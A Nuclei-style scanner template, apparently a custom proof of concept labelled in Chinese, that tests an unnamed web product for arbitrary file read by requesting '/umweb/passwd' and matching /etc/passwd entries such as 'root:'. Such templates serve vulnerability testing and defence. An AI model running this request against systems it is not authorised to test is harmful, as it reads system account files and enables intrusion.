http:
- headers:
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
  matchers:
  - condition: or
    type: word
    words:
    - 'root:'
    - 'daemon:'
    - 'bin:'
    - 'sys:'
    - 'sync:'
  method: GET
  path:
  - '{{BaseURL}}/umweb/passwd'
id: custom-测试任意文件读取
info:
  author: 如烟
  description: 测试任意文件读取 - 自定义POC，基于实际测试结果生成
  name: 测试任意文件读取
  severity: high
  tags: custom,file-read